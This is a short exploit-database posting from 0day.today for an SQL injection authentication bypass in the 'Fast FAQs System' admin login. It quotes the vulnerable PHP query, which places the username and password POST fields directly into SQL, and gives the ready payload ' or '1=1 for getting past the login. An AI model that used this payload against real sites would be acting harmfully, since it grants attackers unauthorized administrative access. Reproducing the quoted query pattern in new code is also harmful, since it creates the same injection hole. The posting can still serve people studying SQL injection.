[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Fast FAQs System (Auth Bypass) SQL Injection Vulnerability

Author
x0r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4626
Category
web applications
Date add
09-01-2009
Platform
unsorted
==========================================================
Fast FAQs System (Auth Bypass) SQL Injection Vulnerability
==========================================================


########################
# -=Fast FAQs System=- #
########################
Autore: x0r
Cms Site: http://fastcreators.com/products/fast_faq/download.php
#########################

Bug In \admin\authorize.php

$query = "select * from admin where userid='{$_POST['uname']}' AND
pass='{$_POST['pass']}'";

Exploit:

' or '1=1

#######################



#  0day.today [2024-12-24]  #